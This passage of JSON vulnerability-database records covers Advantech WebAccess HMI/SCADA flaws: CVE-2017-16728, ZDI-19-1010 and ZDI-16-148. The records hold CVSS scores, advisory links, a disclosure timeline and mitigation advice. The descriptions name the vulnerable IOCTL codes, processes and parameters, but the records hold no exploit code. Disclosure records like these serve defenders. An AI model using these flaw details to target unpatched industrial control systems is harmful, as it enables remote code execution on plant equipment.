"ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" } ], "trust": 10.5 }, "cve": "CVE-2017-16728", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-16728", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 10.5, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-16728", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-00673", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-16728", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2017-16728", "trust": 10.5, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2017-16728", "trust": 1.0, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-00673", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201801-241", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "CNNVD", "id": "CNNVD-201801-241" }, { "db": "NVD", "id": "CVE-2017-16728" } ] }, "description": { "_id": null, "data": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3", "sources": [ { "db": "NVD", "id": "CVE-2017-16728" }, { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" } ], "trust": 11.07 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-16728", "trust": 12.9 }, { "db": "BID", "id": "102424", "trust": 2.2 }, { "db": "ICS CERT", "id": "ICSA-18-004-02", "trust": 1.6 }, { "db": "CNVD", "id": "CNVD-2018-00673", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201801-241", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5003", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-035", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4959", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-012", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4973", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-020", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5006", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-038", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5007", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-039", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5010", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-040", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4999", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-031", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4960", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-013", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4953", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-010", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4975", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-022", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4961", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-014", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4997", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-029", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4952", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-009", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5005", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-037", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5000", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-032", "trust": 0.7 }, { "db": "IVD", "id": "E2E1079E-39AB-11E9-9B2B-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "CNNVD", "id": "CNNVD-201801-241" }, { "db": "NVD", "id": "CVE-2017-16728" } ] }, "id": "VAR-201801-0152", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00673" } ], "trust": 1.23470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00673" } ] }, "last_update_date": "2024-11-29T22:49:44.989000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 10.5, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "title": "Patch for Advantech WebAccess Denial of Service Vulnerability (CNVD-2018-00673)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/113125" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77552" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "CNNVD", "id": "CNNVD-201801-241" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-822", "trust": 1.0 }, { "problemtype": "CWE-476", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2017-16728" } ] }, "references": { "_id": null, "data": [ { "trust": 12.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" }, { "trust": 2.2, "url": "http://www.securityfocus.com/bid/102424" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "CNNVD", "id": "CNNVD-201801-241" }, { "db": "NVD", "id": "CVE-2017-16728" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-035", "ident": null }, { "db": "ZDI", "id": "ZDI-18-012", "ident": null }, { "db": "ZDI", "id": "ZDI-18-020", "ident": null }, { "db": "ZDI", "id": "ZDI-18-038", "ident": null }, { "db": "ZDI", "id": "ZDI-18-039", "ident": null }, { "db": "ZDI", "id": "ZDI-18-040", "ident": null }, { "db": "ZDI", "id": "ZDI-18-031", "ident": null }, { "db": "ZDI", "id": "ZDI-18-013", "ident": null }, { "db": "ZDI", "id": "ZDI-18-010", "ident": null }, { "db": "ZDI", "id": "ZDI-18-022", "ident": null }, { "db": "ZDI", "id": "ZDI-18-014", "ident": null }, { "db": "ZDI", "id": "ZDI-18-029", "ident": null }, { "db": "ZDI", "id": "ZDI-18-009", "ident": null }, { "db": "ZDI", "id": "ZDI-18-037", "ident": null }, { "db": "ZDI", "id": "ZDI-18-032", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-00673", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201801-241", "ident": null }, { "db": "NVD", "id": "CVE-2017-16728", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-10T00:00:00", "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-035", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-012", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-020", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-038", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-039", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-040", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-031", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-013", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-010", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-022", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-014", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-029", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-009", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-037", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-032", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00673", "ident": null }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-241", "ident": null }, { "date": "2018-01-05T08:29:00.393000", "db": "NVD", "id": "CVE-2017-16728", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-035", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-012", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-020", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-038", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-039", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-040", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-031", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-013", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-010", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-022", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-014", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-029", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-009", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-037", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-032", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00673", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-241", "ident": null }, { "date": "2024-11-21T03:16:52.023000", "db": "NVD", "id": "CVE-2017-16728", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-241" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-009" } ], "trust": 2.1 }, "type": { "_id": null, "data": "Code problem", "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-241" } ], "trust": 0.8 } }
var-201912-2034
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwOpcBs.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-19-1010", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-1010", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwOpcBs.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7883", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-1010", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ] }, "id": "VAR-201912-2034", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:46:21.009000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-19-1010", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-12-12T00:00:00", "db": "ZDI", "id": "ZDI-19-1010", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-12-12T00:00:00", "db": "ZDI", "id": "ZDI-19-1010", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess Node BwOpcBs Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-1010" } ], "trust": 0.7 } }
var-201602-0480
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C71 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0480", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-148", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-148", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C71 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3171", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-148", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "id": "VAR-201602-0480", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:01:09.714000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-148" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-148" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-148" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName strncpy Stack-Based Buffer Overflow Remote Code Execution 